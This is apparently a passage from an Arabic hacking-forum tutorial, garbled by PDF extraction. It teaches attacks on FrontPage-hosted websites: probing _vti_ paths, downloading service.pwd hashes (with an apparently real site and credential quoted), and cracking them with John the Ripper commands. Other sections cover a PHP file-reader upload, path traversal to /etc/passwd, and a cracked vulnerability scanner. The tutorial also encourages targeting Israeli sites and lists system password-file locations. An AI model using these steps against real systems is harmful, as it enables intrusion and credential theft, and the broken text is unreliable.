ﻫﻮ ﻋﺒﺎرة ﻋﻦ ﺣﺰﻣﺔ ﻣﻦاﻟﺒ ﺮاﻣ ﺞ ﯾ
ﻟﺪﻋﻢﺑﻌ ﺾاﻟﺨﺼﺎﺋ ﺺ .
private_/
vti_bin_/
vti_cnf_/
vti_log_/
vti_pvt_/
vti_txt_/
/vti_adm_/..
/vti_aut_/..
ﺘﻔﺎدة ﻣﻨﻪاذاﻟﻢﺗ ﺤﺼ ﻞ
ﺘﻄﯿﻊاﻻﺳ
اﻟﺜﺎﻧﻲ ﻻ ﯾﻬﻤﻨﺎﺑﻘﺪر ﻣﺎ ﯾﻬﻢاﻟﻤﺠﻠﺪاﻷو لاذأﻧﻪاﻟﺨﺎ صﺑﺎﻟﻤﺸ ﺮ ف وﻻﺗﺴ
ﻋﻠﻰﻛﻠﻤﺔاﻟﻤ ﺮوراﻟﺨﺎﺻﺔﺑﻪ .
ﻛﻤﺎ ﯾﻮﺟﺪ ﻣﻠﻔﺎنﻫﻤﺎ :
١ ٣١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
shtml.exe/..
fpcount.exe/..
ﺘﺎﻟﯿﺔ :
ﺘﻮاﺟﺪﺑﺪا ﺧﻠﻪ ﻋﺪة ﻣﻠﻔﺎ ت ﻣﺎ ﯾﻬﻤﻨﺎ ﻣﻨﻬﺎﻫﻮاﻟﻤﻠﻔﺎ تاﻟ
وﯾ
ﻗﻊ ﻣﻠ ﻒ htaccess.
ﺘﻮﯾﺎ تاﻟﻤﺠﻠﺪاذ ﯾﻮﺟﺪﻓﻲاﻟﻤﺠﻠﺪاﻟ ﺮﺋﯿﺴﻲﻟﻠﻤﻮ ﺘﻄﯿﻊ ﻣﻌﺎﯾﻨﺔ ﻣ ﺤوﻓﻲاﻟﻐﺎﻟﺐ ﻻﺗﺴ
ﯾﻘﻮمﺑﻤﻨﻊاﻟﺠﻤﯿﻊ )اﻟﻤﺎﻟﻚ واﻟﻤﺠﻤﻮﻋﺔ و
ﺘﻮﯾﺎﺗﻪ . اﻟﺰوار ( ﻣﻦ ﻣﻌﺎﯾﻨﺔاﻟﻤﺠﻠﺪ و ﻣ ﺤ
ـ . HTTP
ـ FrontPage Extension Serverﻋﻠﻰﺑ ﺮوﺗﻮﻛﻮ لاﻟ
ﺘﻤﺪاﻻﺗﺼﺎ لﺑﯿﻦاﻟﻌﻤﯿ ﻞ واﻟ
ﯾﻌ
ـ FrontPageو ﺘﺠﺪﻫﺎﺗﺪﻋﻢ ﺧﺪﻣﺔاﻟﺘﺴﻜﯿﻦﺗﺴﻌﻰﻟ ﺮا ﺣﺔاﻟﻌﻤﻼ ء ،ﻓ ًانأﻏﻠﺐ ﺷ ﺮﻛﺎ تاﻟ ﻛﻤﺎ ذﻛ ﺮﻧﺎ ﺳﺎﺑﻘﺎ
ًﺑﺄﻧﻬﺎﻗﻊ ﻋﻠﻤﺎﺘ ﺤﻤﯿ ﻞاﻟﺼﻔ ﺤﺎ تﻟﻠﻤﻮ ذﻟﻚﻟ
ﺘﻲ ً ﻋﻠﻰاﻟﺒ ﺮﻣﺠﯿﺎ تاﻟ
ﺘﻤﺎدا
ﺘﺼﻔﺢاﻋ ـ FTPوﺗ ﺤﻤﯿ ﻞاﻟﻤﻠﻔﺎ ت واﻧﺸﺎ ءاﻟﻤﺠﻠﺪا ت ﻋﺒ ﺮاﻟﻤ ﺗﺪﻋﻢﺑ ﺮوﺗﻮﻛﻮ لاﻟ
ﺗﻌﻤ ﻞﺑﻨﺎ ﺣﯿﺔاﻟﺨﺎدم .
ـ : FrontPage Extension Server ﺘﺎﻟﻲﻟﻤﻌ ﺮﻓﺔﻛﯿﻔﯿﺔاﻻﺗﺼﺎ لﺑﺎﻟ ﺘﻨﻔﯿﺬاﻟواﻵنﻗﻢﺑ
١ ٣٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻗﯿﺔإﻻﻓﻲﺑﻌ ﺾاﻟﻨﻘﺎط
ً ﻋﻦاﻟ ﺤﺰماﻟﺒﺎ
ﺘﻠ ﻒأﺑﺪا
ﺘﻲ ﻻﺗﺨ
ـ XPواﻟ
ً ﻋﻦ ﺣﺰﻣﺔاﻟ
) ﻣﻼ ﺣﻈﺔ :ﺳﺄﺗﻜﻠﻢ ﺣﺎﻟﯿﺎ
اﻟﺸﻜﻠﯿﺔ (
ـ FrontPageأم ﻻ :
ﻗﻊ ﯾﺪﻋﻢاﻟ
@ﻛﯿﻔﯿﺔ ﻣﻌ ﺮﻓﺔ ﻫ ﻞاﻟﻤﻮ
ﺘﺜﺒﯿ ﺖ :
* ﻣﻌﺎﯾﻨﺔ ﻣﻠ ﻒ ﻧﺠﺎ حاﻟ
http://www.Victim.com/_vti_inf.html
ﺘﺎﻟﻲ :
وﻟﻤﻌ ﺮﻓﺔا ﺻﺪارةاﻟﺨﺪﻣﺔﻗﻢﺑﺎﻟ
http://www.Victim.com/_vti_cnf
١ ٣٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
vti_generator:Programe
ﺘﻨﺎ ﻫﻮ Microsoft
-ﺣﯿﺚ Programeﯾﺸﯿ ﺮﻟﻨﻮ عاﻟﺒ ﺮﻧﺎﻣ ﺞ وا ﺻﺪارﺗﻪ و ﺳﯿﻜﻮنﻓﻲ ﺣﺎﻟ
FrontPage Xواﻻ ﺻﺪارةاﻟﺨﺎﺻﺔﺑﻪ ﻫﻲ . X
-ﺣﯿﺚ Programeﯾ ﺮﻣﺰﻟﻨﻮ عاﻟﺒ ﺮﻧﺎﻣ ﺞ واذاﻛﺎناﻟﺒ ﺮﻧﺎﻣ ﺞﻫﻮ Microsoft FrontPage X.0
ﻗﻊ ﯾﺪﻋﻢاﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ و ﺘﺒﯿﻦﻟﻨﺎﺑﺄناﻟﺨﺎدماﻟﺨﺎ صﺑﺎﻟﻤﻮ
ﯾ
اﻻﺻﺪارةاﻟﺨﺎ ﺻﺔﺑﻪ ﻫﻲ . X
ﻗﻊ : NetCraft
* ﻋﻦ ﻃ ﺮﯾ ﻖ ﻣﻮ
ـ : Telnet
* ﻋﻦ ﻃ ﺮﯾ ﻖاﻟ
) ﻣﻼ ﺣﻈﺔ :ﺗﺴﺎﻋﺪﻫﺬهاﻟﻄ ﺮﯾﻘﺔﻓﻲ ﻣﻌ ﺮﻓﺔﺑﻌ ﺾاﻟﻤﻌﻠﻮﻣﺎ ت ﻋﻦاﻟﺨﺎدم واﻟﻤﺨ ﺮﺟﺎ تﻫﻲ ﻧﻔ ﺲ ﻣﺨ ﺮﺟﺎ ت
اﻟﻄ ﺮﯾﻘﺔاﻟﺴﺎﺑﻘﺔ (
ﺘﻈﻬ ﺮ . Telnet
ﺘﻲ ﺳ
ﺘﺐﺑﺎﻟﻨﺎﻓﺬةاﻟ ﺘﯿﺎر Runواﻛ -ﻣﻦﻗﺎﺋﻤﺔ Startﻗﻢﺑﺎ ﺧ
ﺘﺎﻟﻲ : ﻗﻊ ﻋﺒ ﺮاﻟﻤﻨﻔﺬ ٨٠ﺑﺎﻟﺸﻜ ﻞاﻟ-ﻗﻢﺑﺎﻻﺗﺼﺎ لﺑﺎﻟﻤﻮ
١ ٣٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺎﻟﻲ :
ـ _vti_pvtﻗﻢﺑﺎﻟ
ﺘﻢ و ﺿﻊ ﺻﻼ ﺣﯿﺎ ت ﻋﻠﻰ ﻣﺠﻠﺪاﻟ
ﻗﻊ ﯾﺪﻋﻢ ﻫﺬهاﻟﺨﺪﻣﺔ وﻟﻢ ﯾ
اذا ﻋﺜ ﺮ ت ﻋﻠﻰ ﻣﻮ
ﻗﻊ
ـ ، PHPﻛﻤﺎأن ﻋﻠﻰاﻟﻤﻮ
ﺘﻨﺎﻓﻬﻲاﻟ
) ﻣﻼ ﺣﻈﺔ :ﻋﻠﯿﻚاﻻﻟﻤﺎمﺑﻠﻐﺔﺗﻌﻤ ﻞ ﻋﻠﻰ ﻧﺎ ﺣﯿﺔاﻟﺨﺎدم وﻓﻲ ﺣﺎﻟ
اﻟ ﻀ ﺤﯿﺔ دﻋﻢ ﻫﺬهاﻟﻠﻐﺔ (
>؟PHP
؛
("open = FOpen($file, "r$
؛
((get = FGets($open, FileSize($file$
؛
Echo $get
؛
FClose $open
؟<
١ ٣٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻐﯿ ﺮ
ﺘﻪ واﻟﻤ
ـﺑﻌﻨﻮاناﻟﻤﻠ ﻒاﻟﺬي ﺣﻤﻠ
ﻗﻪﺑ
ﺘﺼﻔﺢ واﻟ ﺤﺎ
ﻗﻊ ﻋﺒ ﺮاﻟﻤ
ﻣﺎ ﻋﻠﯿﻚﻓﻌﻠﻪاﻵن ﻫﻮاﻟﺪ ﺧﻮ ل ﻋﻠﻰاﻟﻤﻮ
fileواﻟﻤﻠ ﻒاﻟﺬيﺗ ﺮﯾﺪ ﻣﻌﺎﯾﻨﺔاﻟﺸﻔ ﺮة
اﻟﻤﺼﺪرﯾﺔاﻟﺨﺎ ﺻﺔﺑﻪ ،ﻣﺜﺎ ل :
www.Victim.com/uploded_file...../../etc/passwd//:http
١ ٣٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$
اﻟﻜﺎﺗﺐ:اﻟﻘﻨﺎ صاﻟﻌ ﺮﺑﻲ
$$$$$$$$$$$$$$
ﺘﺨﺪام ﻫﺬهاﻟﺜﻐ ﺮة .س:٢ﻟﻘﺪ ﺳﻤﻌ ﺖﻛﺜﯿ ﺮا ﻋﻦﺛﻐ ﺮا ت ﺎﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ ،ﻫ ﻞ ﯾﻤﻜﻨﻚﺗﻮ ﺿﯿﺢ ﻃ ﺮﯾﻘﺔاﺳ
ﺛﻨﯿﻦ:Dﺘﺄﻛﯿﺪ ﺣﺒﻲ وﻣﻦ ﻋﯿﻮﻧﻲاﻻ ﺞ:٢ﺑﺎﻟ
ـﺘﻲ ﯾﺪﻋﻢ ﺳﯿ ﺮﻓ ﺮاﺗﻬﺎاﻟ
ﺘﺸﻐﯿ ﻞ NT & Unixﺎﻟ ﺘﻜﻮن ﻣﻮﺟﻮدةﻓﻲأﻧﻈﻤﺔاﻟ ﻃﺒﻌﺎﺛﻐ ﺮا تاﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞﺑ
ﻗﻊ (: ﺘﻤﻜﻨﻚ ﻣﻦ ﻣﻌ ﺮﻓﺔﻛﻠﻤﺔ ﺳ ﺮاﻷدﻣﯿﻦﺗﺒﻊاﻟﻤﻮ FrontPage ,ﻮﺑ
ﺘﺎﻟﯿﺔ:
ﺘﻜﻮن ﻣﻮﺟﻮدةﻓﻲاﻟﻤﻠﻔﺎ ت ﺎﻟ ﻮﻛﻠﻤﺎ تاﻟﺴ ﺮ ﻫﺬهﺑ
Administrator.pwd
Administrators.pwd
Authors.pwd
Users.pwd
ﺘﻜﻮن ﻋﺎدةﻓﻲاﻟﻤﺠﻠﺪ_vti_pvt ﺘﻲﺑ ﺎﻟ
ﻣﺜ ﻞ ﻫﺬهاﻟﻤﻠ ﻒ ﻣﺜﻼ:)http://www.tradesystemlab.com/_vti_pvt/service.pwd :
ﺘﻮبﺑﺪا ﺧﻠﻪ ﻫﻜﺬاﺗﻘ ﺮﯾﺒﺎ: ﻗﻲ ﻣﻜ ﺘﻼﺘﺢاﻟﻤﻠ ﻒ service.pwdﻫ ﻮﺑﻌﺪﻓ
# -FrontPage-
tradesys:FpNTpIDWSk872
ﺘﺨﺪم):ﻮﻫﺬهﻛﻠﻤﺔاﻟﺴ ﺮاﻟﻤﺸﻔ ﺮة واﺳﻢاﻟﻤﺴ
ﺘﺨﺪم وﻛﻠﻤﺔاﻟﺴ ﺮ ﻫﺬه : س :٤ﻣﺸﻜﻮر ﺣﺒﯿﺒﻲ ﻮﻟﻜﻦﻟﯿ ﺶ ﻣﺎﯾﺪ ﺧ ﻞﺑﺎﺳﻢاﻟﻤﺴ
tradesys:FpNTpIDWSk872؟؟)(N
ﺞ:٤ﺑﻜ ﻞﺑﺴﺎ ﻃﻪﻷﻧﻬﺎ ﻣﺸﻔ ﺮة !! ،ﯾﻤﻜﻨﻚﻓﻚﺗﺸﻔﯿ ﺮﻫﺎ ﻋﻦ ﻃ ﺮﯾ ﻖﺑ ﺮﻧﺎﻣ ﺞ ﻣﺜ ﻞﺑ ﺮﻧﺎﻣ ﺞ John The
Ripper ,ﻧﺰﻟﻪ ﻣﻦ ﻫﻨﺎhttp://www .openwall.com/john :
١ ٣٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺨﺪم ﻫﺬااﻟﺒ ﺮﻧﺎﻣ ﺞ ،ﻣﻤﻜﻦﺗﺸ ﺮ ﺣﻬﻮﻟﻲأ ﺧﻲاﻟﻌﺰﯾﺰاﻟﻘﻨﺎ صﻟﻮ ﺳﻤ ﺤ ﺖ ؟؟ س:٥أﻫﺎ ،ﻟﻜﻨﻲ ﻣﺎأﻋ ﺮ فﺄﺳ
ﺘﺄذن ﻣﻨﻲ ﯾﺎوﻟﺪ !! ،أﻧﺎﻓﻲاﻟﺨﺪﻣﺔ ، (:ﺷﻮ ف:اﻧ ﺖأو ل ﻣﺎﺗﻨﺰ لاﻟﺒ ﺮﻧﺎﻣ ﺞ وﺗﻔﻚ ﺿﻐﻄﻪ ،ﻫﯿﻜﻮن ﺞ :٥ﻻﺗﺴ
ﺘﺢ ﻓﯿﻪ ﻣﺠﻠﺪﯾﻦ : doc & run ,ﺎﻟﻲ ﯾﻬﻤﻨﺎ ﻫﻮ ﻣﺠﻠﺪ run ,ﺷﻮ ف :ﻋﺸﺎنﺗﺴﻬ ﻞ ﻋﻠﻰ ﻧﻔﺴﻚ وﺑﺪ ل ﻣﺎﺗﻔ
اﻟﺪوس وﺗﺪ ﺧ ﻞ ﻋﻠﻰ ﻣﺠﻠﺪاﻟﺒ ﺮﻧﺎﻣ ﺞ وﻫﺎﻟﻤﺸﺎﻛ ﻞ وﻛﻤﺎناﻟﺒﻌ ﺾ ﻣﺎﺑﯿﻌ ﺮ ف ﯾﻌﻤ ﻞﻫﺎﻷﺷﯿﺎ ء:p :
ﻗﻢﺑﻨﺴﺨﻪ واﻟﺼﻘﻪﻓﻲ ﻣﺠﻠﺪ run ,ﺄوﻛﻰ ؟؟ ﺎﺑ ﺤﺚﻓﻲ ﺟﻬﺎزك ﻋﻦ : command.comﻮ
ﻮﺟﯿﺐﻛﻠﻤﺔاﻟﺴ ﺮ ﻫﺬه : tradesys:FpNTpIDWSk872ﻮ ﺣﻄﻬﺎﻓﻲ ﻣﻠ ﻒ txtﺑﺎﺳﻢ passwdﻣﺜﻼ
ﺘﺎﻟﯿﺔ:ﺘﺐﻓﯿﻪاﻷواﻣ ﺮاﻟ ﺘﺢ command.comﻮاﻛ ﺘﺢ john.exe ,ﺎﻓ و ﺿﻌﻪﻓﻲ ﻣﺠﻠﺪ run ,ﻮﻻﺗﻘﻢﺑﻔ
ﺘﺨﺪم ﺘﻲﺗﻜﻮن ﻣﻄﺎﺑﻘﻪ ﻻﺳﻢاﻟﻤﺴ >> john -single passwd.txtﻟﯿﺒ ﺤﺚﻟﻚ ﻋﻦاﻟﻜﻠﻤﺎ ت ﺎﻟﺴ ﺮﯾﺔاﻟ
ﻗﺎمﻓﻘﻂ >> john -i:Digits passwd.txtﻟﯿﺒ ﺤﺚﻟﻚ ﻋﻦاﻷر
>> john -i:Alpha passwd.txtﻟﯿﺒ ﺤﺚﻟﻚ ﻋﻦاﻟ ﺤ ﺮو ف ﺎﻟﺼﻐﯿ ﺮة
ﺘﺨﺪمﻫﺬااﻷﻣ ﺮ ، ﺘﻤﺎﻻ ت ) ،وأﻧﺎ ﻋﻠﻰ ﻃﻮ لأﺳ>> john -i:all passwd.txtﻟﯿﺒ ﺤﺚﻟﻚ ﻋﻦ ﺟﻤﯿﻊاﻻ ﺣ
ﺘﻄﻮ ل ﻋﻤﻠﯿﺔاﻟﻔﻚ ﻣﻌﻲ) :D ﻋﺸﺎنﻛﺪهﺑ
ﺘﺠﺪﻛﻠﻤﺔاﻟﺴ ﺮاﻟﻤﺸﻔ ﺮة واﻟﻤﻔﻜﻮﻛﻪﺑﺎﻟﻤﻠ ﻒ ﻫﺬاjohn.pot: ﺘﻬﻲاﻟﺒ ﺮﻧﺎﻣ ﺞ ﻣﻦﻓﻚاﻟﻜﻠﻤﺔ ﺳ ﻮﺑﻌﺪﻣﺎ ﯾﻨ
ﺘﺨﺪم ؟؟
س:٧اﻟ ﺤﻤﺪ ﷲ ،ﺧﻼ صاﻧﻔﻜ ﺖﻛﻠﻤﺔاﻟﺴ ﺮ (Y) ,ﻟﻜﻦ وﯾﻦاﺳﻢ ﺎﻟﻤﺴ
ﺘﺨﺪم ( : tradesys
ﺞ:٧ﻓﻲﻛﻠﻤﺔاﻟﺴ ﺮ ﻫﺬه : tradesys:FpNTpIDWSk872 ,ﻫﯿﻜﻮناﺳﻢ ﺎﻟﻤﺴ
ﺘﻜﻮنﻗﺒ ﻞ ﻋﻼﻣﺔ ( :
ﯾﻌﻨﻲاﻟﻜﻠﻤﺔاﻟﻲﺑ
س :٩ﻃﯿﺐأﻧﺎ ﻋﻨﺪي ﺳﺆاﻟﯿﻦ ﻋﺎﻟﺠﻮاباﻟﻲﻓﺎ ت ده ،ﻫﺄﺳﺄ ل ﻮا ﺣﺪاﻷو ل ، (:اﯾﻪ ﻃ ﺮﯾﻘﺔاﻟﺒ ﺤﺚاﻟﻌﺸﻮاﺋﻲ
ﻫﺬه ؟؟
ﻗﻲ
ـ spidersﻋﺸﺎنﺗﻼ ﺘﺨﺪماﻟ ﺞ:أ ﺣﻢأ ﺣﻢ ،ﻫﺬهاﻟﻄ ﺮﯾﻘﺔ :ﺎﻧﻚﺗﺒ ﺤﺚ ﻋﻦﺛﻐ ﺮة ﻣﻌﯿﻨﺔﻓﻲ ﻣ ﺤ ﺮكﺑ ﺤﺚ ﯾﺴ
ﻗﻮﻟﻚﻟﻚ ﻋﻠﻰأي ﺘﺨﺪماﻟﺴﺒﺎﯾﺪرز ،ﻟﻜﻦﻟﻦأ ﺘﺴﻗﻊﻛﺜﯿ ﺮةﺑ ﻗﻊﻛﺜﯿﯿﯿ ﺮةﻓﯿﻬﺎاﻟﺜﻐ ﺮةﻫﺬه ،ﻓﻲ ﻃﺒﻌﺎ ﻣﻮا ﻣﻮا
ﻗﻊ
ﺘﺎﺋ ﺞﺗﻜﻮن ﻣﻮا
ﻗﻊاﺳ ﺮاﺋﯿﻠﻲ ،ﻋﺸﺎن ﻣﻌﻈﻢ ﺎﻟﻨ ﻗﻊ : walla.co.ilﻮ ﻃﺒﻌﺎﻫﺬا ﻣﻮ ﻮا ﺣﺪة ﻣﻨﻬﺎ ،اﻻ ﻫﺬااﻟﻤﻮ
اﺳ ﺮاﺋﯿﻠﯿﺔ؛( .
١ ٣٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﻚ زﯾﻦ !! ﺲ :١٠ﻣﻤﻤﻤﻢ ،ﻛﯿ ﻒ ﯾﻌﻨﻲﺗﺒ ﺤﺚ ﻋﻦﺛﻐ ﺮة ﻣﻌﯿﻨﻪ ؟؟ ،ﻣﺎﻓﻬﻤ
ﻗﻊاﻻﻟﻠﺒ ﺤﺚ ﻋﻦﺛﻐ ﺮا ت ﺎﻟﻔ ﺮوﻧ ﺖﺑﯿ ﺞ ، $:ﯾﻌﻨﻲاﻧ ﺖ ﻣﺜﻼ ﻋﺎﯾﺰﺗﺒ ﺤﺚ ﻋﻦﺘﺨﺪم ﻫﺎﻟﻤﻮاﺞ:١٠أﻧﺎ وا ﷲ ﻣﺎأﺳ
ﺘﺐ ﺎﯾﻪ ؟؟ ،ﻣﺎﻧ ﺖﻛﺎﺗﺐ ﻏﯿ ﺮﻛﻠﻤﺔ وا ﺣﺪة ،ﻫﺬه ): service.pwd :) : ﺘﻜ ﺘﻲﺗﻢ ذﻛ ﺮﻫﺎ ﺳﺎﺑﻘﺎ ،ﻫ اﻟﺜﻐ ﺮةاﻟ
):
س:١١ﺄﻫﺎااااا ،ﻣﺸﻜﻮر ﺣﺒﯿﺒﻲ ،ﻛﻨ ﺖ ﻋﺎﯾﺰأﺳﺄﻟﻚﻛﻤﺎن ﻋﻦﻛﯿﻔﯿﺔ ﻋﻤ ﻞﺑ ﺮاﻣ ﺞاﻟﺴﻜﺎن ﻋﻠﻰ ﺎﻟﺜﻐ ﺮا ت (:
ﺘﺒﺪأﺗﺠ ﺮبﺛﻐ ﺮة ـ EXPLOITES ,ﻮﺑ ﺘﻜﻮنﻓﯿﻬﺎ ﻣﺠﻤﻮﻋﺔﻛﺒﯿ ﺮة ﻣﻦاﻟﺜﻐ ﺮا تأواﻟ ﺞ:١١اﻟﺒ ﺮاﻣ ﺞﻫﺬهﺑ
ـ EXPLOITES ,ﻫﺬا ﻗﻊ ﺮﻫﯿﯿﯿﺐ ﻋﺸﺎنﺗﺠﯿﺐ ﻣﻨﻪاﻟ ﺘﺎﺋ ﺞ ، (:وﻓﻲ ﻣﻮ
ﻗﻊ ،وﺗﻄﻠﻌﻠﻚاﻟﻨ
ﺛﻐ ﺮة ﻋﻠﻰاﻟﻤﻮ
ﻫﻮ... http://www.ussrback.com/ :
١ ٣٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$$$$$
ـﺮ
ـ
ـﺪ><
ــ
ـ
ـ><ـ
ـ
اﻟﻜﺎﺗﺐ:اﻟ
$$$$$$$$$$$$$$$
ﻣﺎﻓﯿﻪﺄﺑﺴﻂ ﻣﻨﻪ
http://www.safety-lab.com/SSS.exe
http://www .e3sar.net/almodammer/ShadowSecurityScanner5.35.exe
ﺎﻟﻄ ﺮﯾﻘﺔ:
========================================
ﺑﻌﺪﺗ ﺤﻤﯿ ﻞ ﺎﻟﺒ ﺮﻧﺎﻣ ﺞ ﻮﺗﻨﺰﯾﻠﻪ ﻮﻋﻤ ﻞ SetUpﻟﻪ
ﺘﺢ ﺎﻟﻜ ﺮاك ﺎﻓ
ﺘﻈﻬ ﺮ ﻫﺬه ﺎﻟﺼﻮرة: ﻮﺑﻌﺪﺬﻟﻚ ﺳ
١ ٤٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
+++++++++++
ﺘﻢﺗﻨﻔﯿﺬ ﺎﻟﻜ ﺮاكٍ[]][ ١ﺎ ﺿﻐﻂﻟﯿ
[]][ ٢ﺑﻌﺪﺈﺗﻤﺎم ﻋﻤﻠﯿﺔ ﺎﻟﻜ ﺮاك ﺎ ﺿﻐﻂ ﻫﻨﺎﻟﻠﺨ ﺮوج
========================================
ـ ﺮ ح*****&
ـ
ـ ﺎﻟﺒ ﺮﻧﺎﻣ ﺞـ
ـ
ـ&*****ﺷ
ﺘﻘﺪمﻟﻲﺑﺎﻟﺴﺆا ل
ﺘﺼﺎر ﻮﻣﻦ ﯾﺼﻌﺐ ﻋﻠﯿﻪ ﺎﻟﻔﻬﻢﺄرﺟﻮﺄن ﯾ
ﺳﻮ فﺄﺷ ﺮ حﺑﺎ ﺧ
ﺘ ﺤﻪ ﻣﻦﻗﺎﺋﻤﺔ
=)ﺑﻌﺪﺗ ﺤﻤﯿ ﻞ ﺎﻟﺒ ﺮﻧﺎﻣ ﺞﻗﻢﺑﻔ
ﺎﺑﺪأStart
ﻮاﺑ ﺤﺚ ﻋﻨﻪ ﺿﻤﻦ ﺎﻟﺒ ﺮاﻣ ﺞ
ﺘﺢﺑﻌﺪﺈﯾﺠﺎد ﺎﻟﺒ ﺮﻧﺎﻣ ﺞﻗﻢﺑﻔ
ShadowScanSecurity
ـﺄﺗﻲﻟﻚ ﻫﺬا(= ﻟﯿ
ﺎﻟﺸﻜ ﻞ-٢-
١ ٤١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﻗﻢ ٤ﻮﻟﻜﻦﺗ ﺤﻤ ﻞ ﺎﺳﻤﻚ )وﻻداﻋﻲﻷنﺗﻨﺸﺄ =١ﺈ ﺿﺎﻓﺔ ﺳﯿﺎﺳﺔ ﺟﺪﯾﺪة ﻮاﻟﻤﻘﺼﻮدﺑﻬﺎﺄﯾﻘﻮﻧﺔﺄ ﺧ ﺮى ﻮﻫﻲ ﺎﻟ ﺮ
ﺑﺎ ﺣﺚﺄو ﺳﯿﺎﺳﺔ ﺟﺪﯾﺪةﻟﻚ ﯾﻜﻔﯿﻚ ﺎﻟﻤﻮﺟﻮدة(
ﺘﻐﯿﯿ ﺮ ﺷﻲ ءﺄﺑﺪاﻓﻲﻫﺬا ﺎﻟﺨﯿﺎر =٢ﺈﻋﺪادا تﻟﻬﺬا ﺎﻟﺒﺎ ﺣﺚ ﻮأﯾ ﻀﺎ ﺎﻧﺎﻻأﻧﺼ ﺤﻚﺑ
ﻗﻢ ٤ﻮﻟﻜﻦ ﻣﻦﺗﺼﻤﯿﻤﻚ ﺘﻲﺗﺸﺒﻪ ﺮ ﺘﻪ ﻮاﻟﻤﻘﺼﻮد ﺎﻷﯾﻘﻮﻧﺔ ﺎﻟ ﺘﻲ ﺎﻧ ﺖ ﺻﻤﻤ =٣ﺣﺬ ف ﺎﻟﻤﻮﺟﻪ ﺎﻟﺠﺪﯾﺪ ﺎﻟ
ﻓﺒ ﻀﻐﻄﻚ ﻫﻨﺎ ﺳﻮ فﺗ ﺤﺬﻓﻬﺎ
=٤ﻋﻠﯿﻚﺗﻈﻠﯿﻠﻪ ﻮﻫﻮ ﺎﻟﻤ ﺮﺑﻊ ﺎﻟﺬي ﯾﻮﺟﺪﺑﻪ ﺧﺼﺎﺋ ﺺ ﺎﻟﺒ ﺤﺚ ﻋﻦﻛ ﻞ ﺷﻲ ء
=٥ﻟ ﺮﺟﻮ عﻟﻠﺨﻠ ﻒ ﻮﻻأﻇﻦﺄن ﻫﻨﺎك ﺮﺟﻮ عﻷﻧﻬﺎ ﺎﻟﻌﻤﻠﯿﺔ ﻮاﻹ ﻃﺎر ﺎﻻو ل
ﺘﺎﺑﻌﺔ =٦ﺎ ﺿﻐﻄﻬﺎﺈذاﺄرد ت ﺎﻟﻤ
=٧ﺈزاﻟﺔ ﺎﻹ ﻃﺎر
ﺎﻟﺸﻜ ﻞ-٣-
ﺎﻟﺸﻜ ﻞ-٤-
١ ٤٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺎﻟﺸﻜ ﻞ-٥-
ﺛﻨﺎ ء ﺿﻐﻂ ﺎﻟﺰر Doneﻮﻓﻲ ﺎﻟﺨﻄﻮة ﺎﻟﺴﺎﺑﻘﺔ ﺳﻮ ف ﯾﻈﻬ ﺮ ﻫﺬا ﺎﻟﻤ ﺮﺑﻊ ﺎﻟﻜﺒﯿ ﺮ ﺄ
ﺘﻔﺼﯿ ﻞﺄﻛﺜ ﺮﻮﻣﻦﻫﻨﺎ ﺳﻮ ف ﻧﺒﺪأ ﺎﻟﺒ ﺤﺚ ﻋﻦ ﺎﻟﺜﻐ ﺮا تﺄﻧﻈ ﺮ ﺎﻟﺸﻜ ﻞﻟ
١ ٤٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺎﻟﺸﻜ ﻞ-٦-
...
١ ٤٤
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$$
ﺘﺮ
اﻟﻜﺎﺗﺐ:ﺑﻼكﻫﻨ
$$$$$$$$$$$
ﻓﻲ ﻧﻄﻢﻟﯿﻮﻧﻜ ﺲ
/etc/shadow
ﺘﯿﻤﺰ ﻓﻲ ﻧﻈﻢ ﺻﻦ ﻣﯿﻜ ﺮوﺳﯿﺴ
/etc/shadow
ﻓﻲ ﻧﻈﻢا ل BSDﺑﺼﻔﻪ ﻋﺎﻣﻪ
/etc/master.passwd
ﻓﻲ ﻧﻈﻢاﻟﺴﯿﻠﯿﻜﻮن ﺟ ﺮاﻓﯿﻜ ﺲ SGIﺎﻟﻤﺴﻤﻰ ARIX
/etc/shadow
ﻧﻈﺎمايﺑﻲاماﻟﻤﺴﻤﻰ AIX
/etc/security/shadow
ﻧﻈﻢ ﯾﻮﻧﻜ ﺲﺑﺼﻔﻪ ﻋﺎﻣﻪ ))اﺗ ﺶﺑﻲ ﯾﻮاﻛ ﺲ )) -ﺗ ﺮو ﯾﻮﻧﻜ ﺲ )) 64ﺧﺎ صﺑﺎﻟﻤﻨﻔ ﺮﯾﻢ وﻧﻈﻢاﻟ ﺮﯾﺴﻚ ٦٤
ﺘﺠﺎ تاﻻﻟﻔﺎ (( (( (( وﺑﻌ ﺾ ﻣﻨ
/etc/shadow
ﺘﻤﺪﺗﺸﻔﯿ ﺮ MD5ﺎﻟﻘﻮي (( ))اﻏﻠﺐ ﻫﺬهاﻻ ﺻﺪارا تﺗﻌ
ﻧﻈﻢ وﯾﻨﺪوزﺑﺼﻔﻪ ﻋﺎﻣﻪ )) (( 2000 - NT - XP
ﺘﺸﻔﯿ ﺮ )) (( LanMan ﺎﻟﻤﻠ ﻒاﻟﻤﻔﻌ ﻞﺑ
/winnt/system32/config/sam
ﺘﻰ وﻟﻮ
